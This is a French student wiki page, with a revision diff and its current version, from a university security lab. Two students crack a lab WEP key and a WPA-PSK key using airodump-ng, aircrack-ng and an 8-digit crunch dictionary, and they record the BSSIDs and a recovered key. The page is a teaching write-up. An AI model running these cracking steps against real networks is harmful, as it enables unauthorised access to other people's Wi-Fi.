« Atelier SysRes SE5 2023/2024 E3 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
 
(13 versions intermédiaires par le même utilisateur non affichées)
Ligne 9 : Ligne 9 :


</syntaxhighlight>
</syntaxhighlight>
[[Fichier:PR.jpg|gauche|vignette|446x446px]]
[[Fichier:PR.jpg|vignette|836x836px|centré]]
 
 
 
       
 
 
 






On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.




On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.




Ligne 32 : Ligne 22 :


</syntaxhighlight>
</syntaxhighlight>
[[Fichier:PR2.jpg|gauche|vignette|567x567px]]
[[Fichier:PR2.jpg|vignette|1369x1369px|centré]]
 
 
 
 
 
 




Ligne 48 : Ligne 32 :
== Cassage de clef WPA-PSK : "kracotte4" ==
== Cassage de clef WPA-PSK : "kracotte4" ==


WiFi : kracotte04
De manière à voir les différents WIFI, on fait la commande :<syntaxhighlight lang="bash">
airodump-ng --ivs wlan0


</syntaxhighlight>


BSSID : 44:AD:D9:5F:87:09


On choisit ce WiFi : kracotte04 à craquer.


Création d'un dictionnaire à l'aide de crunch


BSSID : 44:AD:D9:5F:87:03


crunch 8 8 0123456789 dico.txt  $Création du dico
Création d'un dictionnaire à l'aide de crunch<syntaxhighlight lang="bash">
crunch 8 8 0123456789 -o dico.txt
</syntaxhighlight>


On créé un dictionnaire pour l'utiliser par la suite  
On créé un dictionnaire pour l'utiliser par la suite <syntaxhighlight lang="bash">
airodump-ng -c 13 --bssid 44:AD:D9:5F:87:03 -w output_10 wlan0
</syntaxhighlight>
[[Fichier:TPO.png|centré|vignette|614x614px]]


airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi
[[Fichier:Blou.jpg|gauche|vignette]]


 
On a besoin de pas mal de Beacons, on laisse donc tourner un petit bout de temps<syntaxhighlight lang="bash">
 
aircrack-ng -b 44:AD:D9:5F:87:03 -w dico.txt output_10*.cap
On a besoin d'au moins 250 000 Data, on laisse donc tourner jusque là
</syntaxhighlight>
 
[[Fichier:WAP.png|centré|vignette|612x612px]]
 
On obtient donc une clé :<syntaxhighlight lang="bash">
 
[]
 
</syntaxhighlight>
 
aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap

Version actuelle datée du 17 janvier 2024 à 18:44

Groupe Elias et Mathis : (Baloo pour la machine mandataire)


Nous utilisons la cracotte4 et kracoote4

Cassage de clef WEP : "cracotte4"

On lance la commande :

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon
PR.jpg


On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.



On va lancer la commande pour le craquage :

 aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
PR2.jpg


La clé a été trouvé très vite :

KEY FOUND! [ FF:FF:FF:FF:FA:BC:05:CB:AE:EE:EE:EE:EE ]

Cassage de clef WPA-PSK : "kracotte4"

De manière à voir les différents WIFI, on fait la commande :

airodump-ng --ivs wlan0


On choisit ce WiFi : kracotte04 à craquer.


BSSID : 44:AD:D9:5F:87:03

Création d'un dictionnaire à l'aide de crunch

 crunch 8 8 0123456789 -o dico.txt

On créé un dictionnaire pour l'utiliser par la suite

airodump-ng -c 13 --bssid 44:AD:D9:5F:87:03 -w output_10 wlan0
TPO.png


On a besoin de pas mal de Beacons, on laisse donc tourner un petit bout de temps

aircrack-ng -b 44:AD:D9:5F:87:03 -w dico.txt output_10*.cap
WAP.png

On obtient donc une clé :

[]